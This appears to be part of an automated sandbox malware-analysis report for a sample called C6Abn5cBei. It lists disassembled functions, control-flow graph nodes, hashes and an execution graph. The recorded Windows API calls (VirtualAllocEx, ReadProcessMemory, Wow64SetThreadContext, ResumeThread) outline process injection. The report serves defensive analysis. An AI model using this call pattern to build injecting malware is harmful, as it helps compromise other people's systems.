                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 290 243d6b9-243d754 DuplicateHandle 291 243d756-243d75c 290->291 292 243d75d-243d77a 290->292 291->292
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0243D747
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 96fdaca627dcd753ce6c949fead366d71e75ebbbef0db6bc3adb6d342461b24c
                                                • Instruction ID: 7fd61b63179981d52ab2125020f39629d1b584ea53e8fdce5584044f22603bd5
                                                • Opcode Fuzzy Hash: 96fdaca627dcd753ce6c949fead366d71e75ebbbef0db6bc3adb6d342461b24c
                                                • Instruction Fuzzy Hash: 452103B5D00249EFDB10CFAAD884AEEBBF5FB48320F14841AE958A3350C375A945CF60
                                                Function 06A4AED8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 295 6a4aed8-6a4af23 297 6a4af25-6a4af31 295->297 298 6a4af33-6a4af63 Wow64SetThreadContext 295->298 297->298 300 6a4af65-6a4af6b 298->300 301 6a4af6c-6a4af9c 298->301 300->301
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A4AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 90a6017ae86d0642539063674fd1ca4420ea778e31a5790af4fa0a273980bb64
                                                • Instruction ID: fe3b6a443ce85f5ba14a7f06ca0da3311c62bfab17c0b23e3f10d8bcd5a90c8e
                                                • Opcode Fuzzy Hash: 90a6017ae86d0642539063674fd1ca4420ea778e31a5790af4fa0a273980bb64
                                                • Instruction Fuzzy Hash: CE213871D003098FDB50EFAAC8857EEBBF4AF88220F548429D559A7241DB789945CFA0
                                                Function 06A4B998 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 305 6a4b998-6a4ba25 ReadProcessMemory 308 6a4ba27-6a4ba2d 305->308 309 6a4ba2e-6a4ba5e 305->309 308->309
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A4BA18
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 3a37b8733daf66ccf01375c5f6c90b13186f17c9e36ee54588c6236ac318ca82
                                                • Instruction ID: 0b701967b9e184f63ed0207858b76f2eb3d52d0f9e2f5f086e0267baef792c91
                                                • Opcode Fuzzy Hash: 3a37b8733daf66ccf01375c5f6c90b13186f17c9e36ee54588c6236ac318ca82
                                                • Instruction Fuzzy Hash: DB2128718003499FDB10DFAAC881BEEFBF5FF88310F508829E518A7240C7799541CBA0
                                                Function 0243D6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 313 243d6c0-243d754 DuplicateHandle 314 243d756-243d75c 313->314 315 243d75d-243d77a 313->315 314->315
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0243D747
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: e0c1923e7b51a40253d0ae652e5cedc32cf1fe118ed04793b5cea91efea4f673
                                                • Instruction ID: 6b623f2f47ba5b6aa134d5f5445f2c516dbbcc14b7f387d482e2273f9a4afecf
                                                • Opcode Fuzzy Hash: e0c1923e7b51a40253d0ae652e5cedc32cf1fe118ed04793b5cea91efea4f673
                                                • Instruction Fuzzy Hash: 6821E3B5900209EFDB10CFAAD984ADEBBF9EB48320F14841AE918A3350D374A940CF61
                                                Function 06A4B3E0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A4B456
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 2249d6f5e936270b9d76db7172170f7aa8800616437488c13b6f3993c489f37c
                                                • Instruction ID: a3141b4bd9d547f2e6d76c9d8ba622273d0de0b44dbd922a9c0edea431f46218
                                                • Opcode Fuzzy Hash: 2249d6f5e936270b9d76db7172170f7aa8800616437488c13b6f3993c489f37c
                                                • Instruction Fuzzy Hash: D411477180024D9FDB10EFAAC844BDEBBF5AF88320F148819E519A7250CB759540CBA0
                                                Function 06A4AE20 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: f1e9dc3de0593a94b8e9e28849b4b14fa47e270d128f714f3fcbe949a589a2fb
                                                • Instruction ID: eb27e60dbb90eb994e377f923a374a98966d46484a1d3f172ff400d5b19ccffd
                                                • Opcode Fuzzy Hash: f1e9dc3de0593a94b8e9e28849b4b14fa47e270d128f714f3fcbe949a589a2fb
                                                • Instruction Fuzzy Hash: 771149718003498FDB10DFAAC8857DFFBF9EB88624F248419D519A7240CB796545CBA4
                                                Function 06A4B3E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A4B456
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: d0113e193a716cb66c17be6f4c12035974706dd27c0d52ff3d5e2223144935c1
                                                • Instruction ID: 18f0a387922ec70174cd1554c00c9b2f0819cd809c31a39908e5c536c8bc11e1
                                                • Opcode Fuzzy Hash: d0113e193a716cb66c17be6f4c12035974706dd27c0d52ff3d5e2223144935c1
                                                • Instruction Fuzzy Hash: 6A1126718003499FDB10EFAAC844BDEBBF5AF88720F148819E519A7250CB75A540CFA0
                                                Function 06A4F878 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4F8DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 7ac0f50121d570f4bf7637cea1035d2dc68725cb7b3bc859d76bb7d2f5bf6dcc
                                                • Instruction ID: 4b78d1e1a8abf94fe5d31060b3c42a74cf0e33522221235015633aabf02c5252
                                                • Opcode Fuzzy Hash: 7ac0f50121d570f4bf7637cea1035d2dc68725cb7b3bc859d76bb7d2f5bf6dcc
                                                • Instruction Fuzzy Hash: 4611E3B58003499FDB10DF9AD885BDEFBF8FB48724F208419E518A7641C375A544CFA1
                                                Function 06A4AE28 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 4722143682e0cab90a5058a9d1ccba46bb7265adb7895d9b229762ad125d6c53
                                                • Instruction ID: 08d17c7364c7e18c2514db35841cb736bdfc79997af02f06d9366bddaba843e4
                                                • Opcode Fuzzy Hash: 4722143682e0cab90a5058a9d1ccba46bb7265adb7895d9b229762ad125d6c53
                                                • Instruction Fuzzy Hash: C0113A71D003498FDB10EFAAC84579FFBF5AF88720F148819D519A7240CB796944CF94
                                                Function 06A4B660 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4F8DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: fb8480f4198d9e6878d6d81158500228abc133c70a0ed86343599e4d81473030
                                                • Instruction ID: aaf7252a6a35f636c6f4ca96955afd77af64d71846a9eae8aaab6dcdd0cb92a2
                                                • Opcode Fuzzy Hash: fb8480f4198d9e6878d6d81158500228abc133c70a0ed86343599e4d81473030
                                                • Instruction Fuzzy Hash: 4C11F2B58003499FDB10EF9AD885BDEBBF8FB88320F108419E558A7241C375A944CFA5
                                                Function 0243AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0243B03E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: fdd58d4103c0cf5e50f29719cf382b0a0bcd413172eee1d25796c3777d84ef29
                                                • Instruction ID: 12d7dc042781fcc3d45c5a77ad40ad147168c080e55f162d37def305cc9a1f09
                                                • Opcode Fuzzy Hash: fdd58d4103c0cf5e50f29719cf382b0a0bcd413172eee1d25796c3777d84ef29
                                                • Instruction Fuzzy Hash: 5A110FB5C003498FDB20CF9AD544BDEFBF4EB88224F10842AD428A7640D379A545CFA1
                                                Function 0A090448 Relevance: .3, Instructions: 296COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14e8c2f34cae32fa0778b4ab31b15db5d477036d473c38f41aff1655f96e43cc
                                                • Instruction ID: d219828ad492251b6ab10b1abae88ca81c18184316f27b7b64f3512baf92775b
                                                • Opcode Fuzzy Hash: 14e8c2f34cae32fa0778b4ab31b15db5d477036d473c38f41aff1655f96e43cc
                                                • Instruction Fuzzy Hash: EFB18C74B012089FDB14DF69D594BAEBBF6AF88700F2540A9E505AB3A1CB71DD01DF90
                                                Function 009CD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39c1839a9fba3c12c72f96d41f90eb394f8037fa28871a7cf8e5ce9321657362
                                                • Instruction ID: e6d1e313776518920e9b8814f386668b32df5430e38bf3b6c4f5fd48e334a4ee
                                                • Opcode Fuzzy Hash: 39c1839a9fba3c12c72f96d41f90eb394f8037fa28871a7cf8e5ce9321657362
                                                • Instruction Fuzzy Hash: FD21D075A05304DFDB14DF18D984F26BBA5FB88324F20C97DD84A4B286C33AD847CA62
                                                Function 009CD1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0ed8259e90b6fcb88c1b81202234eb99e61502c2573e78c0e6a963db984933f
                                                • Instruction ID: 14bca19efb65bba0a3221092572aaf823a0825b9a159eedd6789586490990103
                                                • Opcode Fuzzy Hash: a0ed8259e90b6fcb88c1b81202234eb99e61502c2573e78c0e6a963db984933f
                                                • Instruction Fuzzy Hash: 4A21D0B5A05304AFDB05DF10D984F26BBA5FB84314F24CA7DE8494B292C33AD846CB62
                                                Function 0A090AE8 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 187bd04b1970e5fa847d7412bcf38866edafb255fba28e48536abd7631a34e2f
                                                • Instruction ID: 419f83a6bd1c5f5dac220a390c6f867b2f1fe4b2e71f2086c1eb159c3507d77c
                                                • Opcode Fuzzy Hash: 187bd04b1970e5fa847d7412bcf38866edafb255fba28e48536abd7631a34e2f
                                                • Instruction Fuzzy Hash: 3A21D53160960ADFDBA48F18D85477ABFE1FB45319F048167E0A9CB29AC375D884EB50
                                                Function 009CD006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be0b5b844f2485bc2a325d6d0ea7892746803144c25fbd8339d4bc181c0bc827
                                                • Instruction ID: 525cd82ee5bdec1eb0cda651450f676c9d51119c6684e53757dd1eacd0df16a4
                                                • Opcode Fuzzy Hash: be0b5b844f2485bc2a325d6d0ea7892746803144c25fbd8339d4bc181c0bc827
                                                • Instruction Fuzzy Hash: DB2150755093809FDB12CF24D994B15BF71EB46314F28C5EED8498B6A7C33A980ACB62
                                                Function 0A090AD9 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1a94b2cac2280c321d81e413b4cb96fe183a27a0609f5ec5bb5ea282b67c8b0
                                                • Instruction ID: e34fc5f95ffc0e6aed90df0c04524a57e667ce9ea17bac68e8ce582a3d065a6f
                                                • Opcode Fuzzy Hash: b1a94b2cac2280c321d81e413b4cb96fe183a27a0609f5ec5bb5ea282b67c8b0
                                                • Instruction Fuzzy Hash: F711043260561ADBDB608F18E854779BFF1FB8531AF058166E059CB28AC375C850FB60
                                                Function 009CD1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1502690391.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9cd000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                • Instruction ID: 3fe9df1f57472315dfdc595e92110c79e65529e0a971e4710bc516669d1d8a2c
                                                • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                • Instruction Fuzzy Hash: 5911DD76904280DFDB01CF10C9C0B15FBB2FB84324F24C6AED8494B296C33AD80ACB62

                                                Non-executed Functions

                                                Function 0A090C00 Relevance: .3, Instructions: 322COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1537244852.000000000A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_a090000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c2cfe77296c5287d1f52f7f5c2a4b76817df3889a9173ec16944f893cdaaa01
                                                • Instruction ID: 2a25c2890a2653f655c52fcbe5ba819bf0287f7042f4fd5f0d6b88b474e18c63
                                                • Opcode Fuzzy Hash: 6c2cfe77296c5287d1f52f7f5c2a4b76817df3889a9173ec16944f893cdaaa01
                                                • Instruction Fuzzy Hash: B8C18D717017188BDB56DF76C460BAEBBFBAF88700F14446ED18A9B690CB35E901CB51
                                                Function 06A4A600 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6fd05e1cd4d559cc74e70601796e30c1fac01f84885d72b159172564db321d8
                                                • Instruction ID: 9e7dcccf01577da0eca02516a98289e664a671ba7817134efae062570616c815
                                                • Opcode Fuzzy Hash: c6fd05e1cd4d559cc74e70601796e30c1fac01f84885d72b159172564db321d8
                                                • Instruction Fuzzy Hash: AFE12F74E006198FDB14EF99C9809AEFBB2FF89301F248169D515AB35AD7319D42CFA0
                                                Function 06A492B0 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 353670522dff56a8793e4a20186a8428f5361c9c6e3759a0b1a3c432de9aa8b9
                                                • Instruction ID: 29410b84840e1275bb951499ece3fe1496995bce3f5ff6f2f395e59ad68dd0ae
                                                • Opcode Fuzzy Hash: 353670522dff56a8793e4a20186a8428f5361c9c6e3759a0b1a3c432de9aa8b9
                                                • Instruction Fuzzy Hash: 07E1FD74E006198FDB14EF99C980AAEFBB2FF89305F248159E415AB355D730AD42CFA1
                                                Function 06A48E78 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 679ce1fb57eb13a79d4ddd3b11800b106fd6abdff65eb3b3490c38db362c7332
                                                • Instruction ID: 92d52a8c182bf710617838ec853852416ffec7089e5ab8eb3c53e771642d1f1f
                                                • Opcode Fuzzy Hash: 679ce1fb57eb13a79d4ddd3b11800b106fd6abdff65eb3b3490c38db362c7332
                                                • Instruction Fuzzy Hash: 63E13C74E002198FDB14EFA9C980AAEFBF2FF89305F248159D414AB356C731A941CFA0
                                                Function 06A4AFB0 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcb7d4f5c5d762ed1ca20dc12a2ff51af70c250c781ab599ae11907e50502aa3
                                                • Instruction ID: 3796c617f77d8a20c50367266427d039e1a9430f16b262654ffdb18a2409209e
                                                • Opcode Fuzzy Hash: dcb7d4f5c5d762ed1ca20dc12a2ff51af70c250c781ab599ae11907e50502aa3
                                                • Instruction Fuzzy Hash: C5E10D74E006198FDB54EF99C980AAEFBB2FF89305F248159D415AB356D730AD42CFA0
                                                Function 06A48A40 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b22f32cca6d5144d707e3baf2226d937b54ba4f0ae5838ea23a07c77675ecabe
                                                • Instruction ID: 493e8eef660fd73442e53e36230b46eda5f68c0e01f17241108b6619427af4d7
                                                • Opcode Fuzzy Hash: b22f32cca6d5144d707e3baf2226d937b54ba4f0ae5838ea23a07c77675ecabe
                                                • Instruction Fuzzy Hash: 05E11C74E006198FDB14EF99D9809AEFBF2FF89305F248169D415AB356C734A942CFA0
                                                Function 0243D3A4 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24b66138fb27aed56aaf43bd8dc25a8b0e5b698d1ffd06dc83f22e6ee54152dc
                                                • Instruction ID: 01393571c9fcda14b76246d8a48c3128eb308c24c5a3c774d31860549bbc1fe6
                                                • Opcode Fuzzy Hash: 24b66138fb27aed56aaf43bd8dc25a8b0e5b698d1ffd06dc83f22e6ee54152dc
                                                • Instruction Fuzzy Hash: 97A16F36E006058FCF06DFB5C94099EB7B2FF89304B16856BE901AB661DB71D95ACF40
                                                Function 06A4AFA0 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd2f4858c81317080c0de26b229cc391b23f54fc674f0b67bd1453b9d0824ec7
                                                • Instruction ID: 3c0fd3506e40431b2cfb160241b87a8e6a68f70abe9878783f5ffc0a3e593f1c
                                                • Opcode Fuzzy Hash: bd2f4858c81317080c0de26b229cc391b23f54fc674f0b67bd1453b9d0824ec7
                                                • Instruction Fuzzy Hash: 84514A74E006198FDB14DFA9C9849AEFBF2FF89301F248169D418AB356D7319942CFA1

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5.1%
                                                Signature Coverage:9.6%
                                                Total number of Nodes:136
                                                Total number of Limit Nodes:8
                                                execution_graph 90744 401a30 90745 4019ff 90744->90745 90748 42feb3 90745->90748 90751 42e4f3 90748->90751 90752 42e519 90751->90752 90763 4074e3 90752->90763 90754 42e52f 90762 401b40 90754->90762 90766 41b193 90754->90766 90756 42e54e 90757 42e563 90756->90757 90781 42cc23 90756->90781 90777 428373 90757->90777 90760 42e57d 90761 42cc23 ExitProcess 90760->90761 90761->90762 90784 4164e3 90763->90784 90765 4074f0 90765->90754 90767 41b1bf 90766->90767 90795 41b083 90767->90795 90770 41b204 90773 41b220 90770->90773 90775 42c843 NtClose 90770->90775 90771 41b1ec 90772 41b1f7 90771->90772 90774 42c843 NtClose 90771->90774 90772->90756 90773->90756 90774->90772 90776 41b216 90775->90776 90776->90756 90778 4283d4 90777->90778 90780 4283e1 90778->90780 90806 4186b3 90778->90806 90780->90760 90782 42cc40 90781->90782 90783 42cc51 ExitProcess 90782->90783 90783->90757 90785 4164fd 90784->90785 90787 416513 90785->90787 90788 42d2c3 90785->90788 90787->90765 90790 42d2dd 90788->90790 90789 42d30c 90789->90787 90790->90789 90791 42be33 LdrInitializeThunk 90790->90791 90792 42d36c 90791->90792 90793 42e943 RtlFreeHeap 90792->90793 90794 42d385 90793->90794 90794->90787 90796 41b09d 90795->90796 90800 41b179 90795->90800 90801 42bed3 90796->90801 90799 42c843 NtClose 90799->90800 90800->90770 90800->90771 90802 42bef0 90801->90802 90805 11c35c0 LdrInitializeThunk 90802->90805 90803 41b16d 90803->90799 90805->90803 90808 4186dd 90806->90808 90807 418beb 90807->90780 90808->90807 90814 413cf3 90808->90814 90810 41880a 90810->90807 90811 42e943 RtlFreeHeap 90810->90811 90812 418822 90811->90812 90812->90807 90813 42cc23 ExitProcess 90812->90813 90813->90807 90816 413d13 90814->90816 90817 413d7c 90816->90817 90819 41b4a3 RtlFreeHeap LdrInitializeThunk 90816->90819 90817->90810 90818 413d72 90818->90810 90819->90818 90671 424e43 90672 424e5c 90671->90672 90673 424ea4 90672->90673 90676 424ee1 90672->90676 90678 424ee6 90672->90678 90679 42e943 90673->90679 90677 42e943 RtlFreeHeap 90676->90677 90677->90678 90682 42cbd3 90679->90682 90681 424eb1 90683 42cbf0 90682->90683 90684 42cc01 RtlFreeHeap 90683->90684 90684->90681 90685 42f9e3 90686 42f9f3 90685->90686 90687 42f9f9 90685->90687 90690 42ea23 90687->90690 90689 42fa1f 90693 42cb83 90690->90693 90692 42ea3b 90692->90689 90694 42cba0 90693->90694 90695 42cbb1 RtlAllocateHeap 90694->90695 90695->90692 90696 42bde3 90697 42be00 90696->90697 90700 11c2df0 LdrInitializeThunk 90697->90700 90698 42be28 90700->90698 90820 424ab3 90821 424acf 90820->90821 90822 424af7 90821->90822 90823 424b0b 90821->90823 90824 42c843 NtClose 90822->90824 90825 42c843 NtClose 90823->90825 90826 424b00 90824->90826 90827 424b14 90825->90827 90830 42ea63 RtlAllocateHeap 90827->90830 90829 424b1f 90830->90829 90701 41b383 90702 41b3c7 90701->90702 90704 41b3e8 90702->90704 90705 42c843 90702->90705 90706 42c860 90705->90706 90707 42c871 NtClose 90706->90707 90707->90704 90708 414083 90709 414090 90708->90709 90714 417833 90709->90714 90711 4140bb 90712 414100 90711->90712 90713 4140ef PostThreadMessageW 90711->90713 90713->90712 90716 417857 90714->90716 90715 41785e 90715->90711 90716->90715 90717 41787d 90716->90717 90721 42fdc3 LdrLoadDll 90716->90721 90719 417893 LdrLoadDll 90717->90719 90720 4178aa 90717->90720 90719->90720 90720->90711 90721->90717 90722 41e583 90723 41e5a9 90722->90723 90727 41e69d 90723->90727 90728 42fb13 90723->90728 90725 41e63e 90725->90727 90734 42be33 90725->90734 90729 42fa83 90728->90729 90730 42fae0 90729->90730 90731 42ea23 RtlAllocateHeap 90729->90731 90730->90725 90732 42fabd 90731->90732 90733 42e943 